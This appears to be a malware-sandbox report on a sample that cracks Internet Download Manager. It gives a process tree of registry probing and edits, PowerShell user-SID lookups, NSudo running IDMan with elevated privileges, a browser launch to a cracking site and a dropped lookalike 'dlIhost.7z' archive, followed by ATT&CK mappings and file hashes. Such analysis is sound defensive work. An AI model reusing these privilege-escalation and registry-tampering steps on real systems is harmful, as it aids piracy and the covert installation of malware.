        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5016
        
        C:\Windows\System32\find.exe
        
        find /i "FullLanguage"
        7⤵
        
        PID:3668
        
        C:\Windows\System32\fltMC.exe
        
        fltmc
        7⤵
        
        PID:4128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "Get-WmiObject -Class Win32_ComputerSystem | Select-Object -Property CreationClassName"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2064
        
        C:\Windows\System32\find.exe
        
        find /i "computersystem"
        7⤵
        
        PID:420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell.exe "([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value" 2>nul
        7⤵
        
        PID:3188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value"
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4832
        
        C:\Windows\System32\reg.exe
        
        reg query HKU\\Software
        7⤵
        
        PID:4676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell.exe "$explorerProc = Get-Process -Name explorer | Where-Object {$_.SessionId -eq (Get-Process -Id $pid).SessionId} | Select-Object -First 1; $sid = (gwmi -Query ('Select * From Win32_Process Where ProcessID=' + $explorerProc.Id)).GetOwnerSid().Sid; $sid" 2>nul
        7⤵
        
        PID:3400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$explorerProc = Get-Process -Name explorer | Where-Object {$_.SessionId -eq (Get-Process -Id $pid).SessionId} | Select-Object -First 1; $sid = (gwmi -Query ('Select * From Win32_Process Where ProcessID=' + $explorerProc.Id)).GetOwnerSid().Sid; $sid"
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4880
        
        C:\Windows\System32\reg.exe
        
        reg query HKU\S-1-5-21-2253712635-4068079004-3870069674-1000\Software
        7⤵
        
        PID:852
        
        C:\Windows\System32\reg.exe
        
        reg delete HKCU\IAS_TEST /f
        7⤵
        Modifies registry key
        
        PID:2192
        
        C:\Windows\System32\reg.exe
        
        reg delete HKU\S-1-5-21-2253712635-4068079004-3870069674-1000\IAS_TEST /f
        7⤵
        
        PID:4064
        
        C:\Windows\System32\reg.exe
        
        reg add HKCU\IAS_TEST
        7⤵
        Modifies registry key
        
        PID:2548
        
        C:\Windows\System32\reg.exe
        
        reg query HKU\S-1-5-21-2253712635-4068079004-3870069674-1000\IAS_TEST
        7⤵
        
        PID:4652
        
        C:\Windows\System32\reg.exe
        
        reg delete HKCU\IAS_TEST /f
        7⤵
        Modifies registry key
        
        PID:1484
        
        C:\Windows\System32\reg.exe
        
        reg delete HKU\S-1-5-21-2253712635-4068079004-3870069674-1000\IAS_TEST /f
        7⤵
        
        PID:2340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE
        7⤵
        
        PID:2976
        
        C:\Windows\System32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE
        8⤵
        
        PID:4184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKU\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\DownloadManager" /v ExePath 2>nul
        7⤵
        
        PID:4772
        
        C:\Windows\System32\reg.exe
        
        reg query "HKU\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\DownloadManager" /v ExePath
        8⤵
        
        PID:3552
        
        C:\Windows\System32\reg.exe
        
        reg add HKU\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST
        7⤵
        Modifies registry class
        
        PID:788
        
        C:\Windows\System32\reg.exe
        
        reg query HKU\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST
        7⤵
        
        PID:3760
        
        C:\Windows\System32\reg.exe
        
        reg delete HKU\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST /f
        7⤵
        Modifies registry class
        
        PID:4640
        
        C:\Windows\System32\mode.com
        
        mode 75, 28
        7⤵
        
        PID:4704
        
        C:\Windows\System32\choice.exe
        
        choice /C:1234567 /N
        7⤵
        
        PID:2136
        
        C:\Windows\System32\mode.com
        
        mode 113, 35
        7⤵
        
        PID:4472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=34;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3472
        
        C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe
        
        NSudo86x -U:C -P:E -UseCurrentConsole "C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /onboot
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4676
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.crackingcity.com/
        7⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2292
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff71e13cb8,0x7fff71e13cc8,0x7fff71e13cd8
        8⤵
        
        PID:4480
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14312988016604951569,14021848150310585296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:2
        8⤵
        
        PID:2532
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,14312988016604951569,14021848150310585296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 /prefetch:3
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2548
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,14312988016604951569,14021848150310585296,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2624 /prefetch:8
        8⤵
        
        PID:3716
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,14312988016604951569,14021848150310585296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
        8⤵
        
        PID:4660
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,14312988016604951569,14021848150310585296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
        8⤵
        
        PID:1460
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,14312988016604951569,14021848150310585296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2376 /prefetch:1
        8⤵
        
        PID:4508
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,14312988016604951569,14021848150310585296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
        8⤵
        
        PID:1704
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,14312988016604951569,14021848150310585296,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
        8⤵
        
        PID:548
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,14312988016604951569,14021848150310585296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
        8⤵
        
        PID:1972
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,14312988016604951569,14021848150310585296,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
        8⤵
        
        PID:4808
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1876,14312988016604951569,14021848150310585296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4896 /prefetch:8
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2844
        
        C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,14312988016604951569,14021848150310585296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5680 /prefetch:8
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3472

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2416

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1136

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d0c46cad6c0778401e21910bd6b56b70

SHA1
7be418951ea96326aca445b8dfe449b2bfa0dca6

SHA256
9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

SHA512
057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9314124f4f0ad9f845a0d7906fd8dfd8

SHA1
0d4f67fb1a11453551514f230941bdd7ef95693c

SHA256
cbd58fa358e4b1851c3da2d279023c29eba66fb4d438c6e87e7ce5169ffb910e

SHA512
87b9060ca4942974bd8f95b8998df7b2702a3f4aba88c53b2e3423a532a75407070368f813a5bbc0251864b4eae47e015274a839999514386d23c8a526d05d85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e1544690d41d950f9c1358068301cfb5

SHA1
ae3ff81363fcbe33c419e49cabef61fb6837bffa

SHA256
53d69c9cc3c8aaf2c8b58ea6a2aa47c49c9ec11167dd9414cd9f4192f9978724

SHA512
1e4f1fe2877f4f947d33490e65898752488e48de34d61e197e4448127d6b1926888de80b62349d5a88b96140eed0a5b952ef4dd7ca318689f76e12630c9029da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
336B

MD5
17b20b39f68cc16b0bb335ed176366a8

SHA1
340cf9b057344f16bd89d10a7172dd2633d7e72d

SHA256
22c24460677f190a3a391a57bac5f041a3109005ba0bc00e6da7fe6e354bb493

SHA512
4a00d150061acee9492a7ba3fe9620cbf1155f763b2d5a37c8f58d5f03de04ef49c849d04049c0cd8d6c533f66d7f6f726b2eec1128f0dc27f1bc2e956da9d73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
a0d14b90497cc835f7313da31e86d6e5

SHA1
86bedec08ec417532d4322f4e7a74ceda75e4f41

SHA256
3d245419629a8965753259c9244ab85cd73deb34372f41a73f2e1a5399952b9a

SHA512
96c415a8d0b23063439b6cdb3d198aa8c7443cfb7b5c5dbc458c745124fd04dc8315e14e549357b7156ee87509528d7b52dcc736ec6cf5ab5a811b75af4ed480

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
0f5ad1f93fa8293ae350bfacf7e5fc16

SHA1
58b54b25fc89bb4ff38d68063c901994f0fb2c6f

SHA256
ba44c8d1503fff185f56f588d5d7ed578951b185388483dbc16a11f7945c87c7

SHA512
2765d9068fc767e99d9f57ec7e680147ba9fd9fcff095a89b6292e2a80122ad66315a7f0917a75f1cf2257079a86798ce227be3348fbef11e7b864e5fdb6aa53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
3acea6c7f564a91c88a31e3d3ebe7f1b

SHA1
e673f25e58b4668bbf4e613ff24b9546d63fd846

SHA256
12aa9537ecdacad23a1ddc3c3f287f3800d417ef6e018943667f43ccfee3bf8c

SHA512
18d247ed5a9584f8c8e53dbb77a0d2d3451e5273cf4c73907ff924da5abb557819a8d3ecf7f69749171b8fa95e16ded458cd8bb11fc33df50aadc6ecaca64b7f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d671b0247b9b395e9ac55458c40baf79

SHA1
ec72601b97e875c42a147d563fcf90c6c0a08147

SHA256
3d39580dca81c1baf00f4a818531c1bf44984e93e331c4fc233f0cd803c0be13

SHA512
f8d879d6984abac47fbbcb2cf81aed30202f623b78cf89348b81644c7751d79c8083428c50379e0a4861a99ec689be355616ffafcd2da13905fe49bea6f8d054

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7a9772bc4c578c1736aa04a056f68da3

SHA1
7bb32e69db056bc9ab222ef4ef45de588b2a8efd

SHA256
3e9dfdec2a1c817075bdfd2a8050630c7f8404f82e84a4374e80f124e102d49d

SHA512
2d4516747b14356725004ec2c227f56d3e2eae475d58e3fdd5b2b3dbef7382def984eb89584f11359a08d5b8ac3dc5a83fff1d9829a775ebbbcc97315265dd97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8c0c8cd187845423dbfa1668e73b12f7

SHA1
044386a5eb82213ab2e1116ea524546b997aed3a

SHA256
002b558aa417c6b8cf42420e92d398de858e4914a48a3ad1bbe851d7294dd5cf

SHA512
5281fc388549cee0a5d0eb2a609d014aa1f889ce07acfefe965af04a301f8d60ff338fc1c709e2e23b1f03709931e819d1a9f77be89097cb6305bbc1be1b3e76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
df6c6eb57f0d3ce87f8a4607292f41c0

SHA1
e06ecc46b245791caaca74445dbb2dc94c18ccae

SHA256
8d833935ca72297ae98fcedb54c152f7486051711a1aae7869876f6c39c41472

SHA512
4bb72d874ded312c12fa2c2feca2ecc70ddb3e9b3ffa5406d215ab9ec43d57310b726e67929e83598ecc55ed4096d47a158ed6d08a64f3576c6b9183170955db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
397d9dd0a6277a8d482826c080c143cb

SHA1
9e5e7e912c88c427b743eec65e68394536e29d3b

SHA256
ca8e1d23f542e07e0a4b638e407e42f626bd4b1b469ab8f87a67329fa346ad7e

SHA512
2438ad1734c013f64468c0c74350924ea7cc26f329ec611778834cb14fad897b2bbf571edbc7ce07c95f5a106994e7a2cf0e421e23576a7cf9e789ccaeafe590

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
887389a1e35ec5e3c7835215f5e375b6

SHA1
93ba5811a1002f8c44758030a5d64a004f0c30dc

SHA256
74e47d3a768c629a6e59ea28ad1b30aab288b70a4b587f4ea8bad159983ba3ab

SHA512
c2538e2ec21e2c8f3cee3f870052ffa2f638dd1a4742cf1aa603d9f5e8b2db52b4adf7b1ed03115874d949d77cc73f4d5d51618dae197f216e0f25df5ffd3e45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
e5cff49610b10b9cac6f9e3e75f23b16

SHA1
870328a44f0496df6248e3ae523e6ea91de80d88

SHA256
9888574a2b42d7f097d1beafdc6a0689746e205c6b694057810f8a21b8f4422c

SHA512
f09331b5f2d2cf5afcb4921935a295e4335ba829f62a38d07fc3fc2239384f772a063740d95fab471ccff6fc058897397e2563f8e7d46f91994e5191fd41c384

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
7d50f7eb2a287d8bd29dc0ab3e6e58da

SHA1
a5e2302999b24cfc0ab2b26bf6a160a99d4cdc52

SHA256
47d5c8ddbda3d8ca512c75cd22c66b190f0751e61fac5cab26cd1310abef46bf

SHA512
44271f63a8890840eb7951e2f5ef68a6d958a9509e14a5d1ce5faa6723a1df9108eab88e85d9cf97bb0bbaa3cfc3d86fdfab03d174f90b7e31926793bbbdd209

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h5x4jtzl.iou.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

Filesize
637KB

MD5
e3c061fa0450056e30285fd44a74cd2a

SHA1
8c7659e6ee9fe5ead17cae2969d3148730be509b

SHA256
e0e2c7d0f740fe2a4e8658ce54dfb6eb3c47c37fe90a44a839e560c685f1f1fa

SHA512
fe7796b4c5aa07c40aa2511a987fed59366d3c27bf7343f126f06cb937bfe7a7d8bd6cd785a7e3dc9087b99973e8542b6da7be6eed4585bd3cee13164aed79b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat

Filesize
32KB

MD5
8b019a913c58322bacbf082de4e81b80

SHA1
a0d503f7958f2acbf00122d265544b4b9b35337a

SHA256
d7509b810f2543daf3e7d1eac4efc381dfa445952a8822cec5b84587a18bdeb0

SHA512
636cee5a3e5fd714c6768f5b059ac68f36f5b3bcd1371fd94b7641c46768d5556f5afd3544937860daf8547a05b82f20a03cb93d4d437e288a0938f9f18c80a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ytmp\IDM0.bat

Filesize
3KB

MD5
644a84d7571765b9f9aaa80b9e67a63e

SHA1
8b357804fc2a452389ad53f0de1797b05520fb71

SHA256
20bab1daa16f5e5d007b457bde1173adcaab22d2d94d5ebae5fcef1de653fa0f

SHA512
697103431bf31cdec2a88c1765c8f68f7659b2d6131e1d37e157c702b0074298dcd0fc458a81d6713b62e2dda1892890f94a9d70de12a9aecbc2e428ed44d379

Download Submit
C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe

Filesize
179KB

MD5
6f69cf85748b3447bfd80a22a4f74564

SHA1
903553bd1afcdff1565e705f77c617c7f3297aee

SHA256
37268f71b2b84f8e67985c51215607c08f09b71c86f7412e7ff0f1480eda3f65

SHA512
0e6d0553f150e16927b96113ffe59896766cc816db93a14cf76ed363df0514569c0ff9808e2b2f6bfcd4f4b06004d435be6dad6023af8abdc1c7687575b185d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ytmp\UpdateTask.xml

Filesize
1KB

MD5
674d0de94982b1c47e117a9d49cccf3a

SHA1
40bed413cb06ea2d4107d6dd132b2a518b950a48

SHA256
cde1da524b4f058d894585c6d9f14771d0471065737f8ed024060f15b224a57b

SHA512
981b2ea83b202cb460f9d3baa80cdf1671429ee02d0966313587bb2b77dc4991908d9107014acc931e8058243b934ed1dd1f38d46cf46019ff8b35965055482b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ytmp\UpdateTask.xml

Filesize
1KB

MD5
2b34630a333afcf8c63de15278471cca

SHA1
e0ba12e71f00b5453e7ec5ce33743423c37ab39c

SHA256
164594a8ef36b545ba5b37ea43f1449b72ab90313216c78115b27cd03ddd57a7

SHA512
abbe5e4141cc8672558bef09c56b2e4bfb725b9b5c67e50b03d7b095f59888e9ae3c63f6fcbf2f98622547f8fff48f9f6fa3bbc7fa46402039eb60df887d9cc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ytmp\files.tmp

Filesize
65KB

MD5
86efb592316773110c1b67b8569ea5d8

SHA1
88ac080d92474ef17fa797c17c924de4c6218407

SHA256
dc664bb88edc327f890b9a052281718066bcb220c7f6541426ad475eae66fd7c

SHA512
d90f94d3a967ec1b86ef0ce29fba345679049b477d3212149b4ee852c860ca1c8dd4dbf8d21d919b598cde72190e726275c5c5eda2ac453650a8c3e6ed13fb30

Download Submit
C:\Users\Admin\AppData\Local\Temp\ytmp\main.bat

Filesize
280B

MD5
3ed6946c40da68e805c93aa96c79b246

SHA1
8a26d82d1c00ad39154dcc912b06aa63d543f9d9

SHA256
1a59a3037d6da10a939c6a54bfbde37ec9c8727ff5b546f36f4ace1258462abb

SHA512
7c6575ff020c97fc5578d9bbeaa1c1007a75e68a57644d8ff9eb64fd8844305123dea44a6d6eb78339d188c35215f3f9bec9119b7dfa107378bcb23abc9844ea

Download Submit
C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z

Filesize
1.5MB

MD5
cc843ec3a0d3451e8a993dc6f1b4e6ce

SHA1
f2de0b99f73e16051033f344d0c4b38f3c75d02a

SHA256
e041e1622158c416d7c4e5b5e11b16b05dce671f3bf1566e5190144bb4a855f8

SHA512
8618dea1493dd7119d6dc7bf64eeaaa93fe00c47af3f55e9cd571a9a08c46d063e742e83d853df640d421634943da99bf95bcedd1ad608191fc9f78f28aea8de

Download Submit
\??\pipe\LOCAL\crashpad_2292_VJQINYRZQWMZKECK

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1460-176-0x0000000070830000-0x000000007087C000-memory.dmp

Filesize
304KB

Download
memory/1624-90-0x0000000005C40000-0x0000000005C5E000-memory.dmp

Filesize
120KB

Download
memory/1624-116-0x00000000075E0000-0x0000000007C5A000-memory.dmp

Filesize
6.5MB

Download
memory/1624-152-0x00000000072E0000-0x00000000072E8000-memory.dmp

Filesize
32KB

Download
memory/1624-140-0x00000000071F0000-0x0000000007205000-memory.dmp

Filesize
84KB

Download
memory/1624-139-0x00000000071E0000-0x00000000071EE000-memory.dmp

Filesize
56KB

Download
memory/1624-129-0x00000000071B0000-0x00000000071C1000-memory.dmp

Filesize
68KB

Download
memory/1624-127-0x0000000007230000-0x00000000072C6000-memory.dmp

Filesize
600KB

Download
memory/1624-67-0x0000000002460000-0x0000000002496000-memory.dmp

Filesize
216KB

Download
memory/1624-123-0x0000000007020000-0x000000000702A000-memory.dmp

Filesize
40KB

Download
memory/1624-68-0x0000000004FC0000-0x00000000055EA000-memory.dmp

Filesize
6.2MB

Download
memory/1624-117-0x0000000006FA0000-0x0000000006FBA000-memory.dmp

Filesize
104KB

Download
memory/1624-142-0x00000000072F0000-0x000000000730A000-memory.dmp

Filesize
104KB

Download
memory/1624-115-0x0000000006E60000-0x0000000006F04000-memory.dmp

Filesize
656KB

Download
memory/1624-114-0x0000000006E40000-0x0000000006E5E000-memory.dmp

Filesize
120KB

Download
memory/1624-105-0x0000000070830000-0x000000007087C000-memory.dmp

Filesize
304KB

Download
memory/1624-104-0x0000000006C00000-0x0000000006C34000-memory.dmp

Filesize
208KB

Download
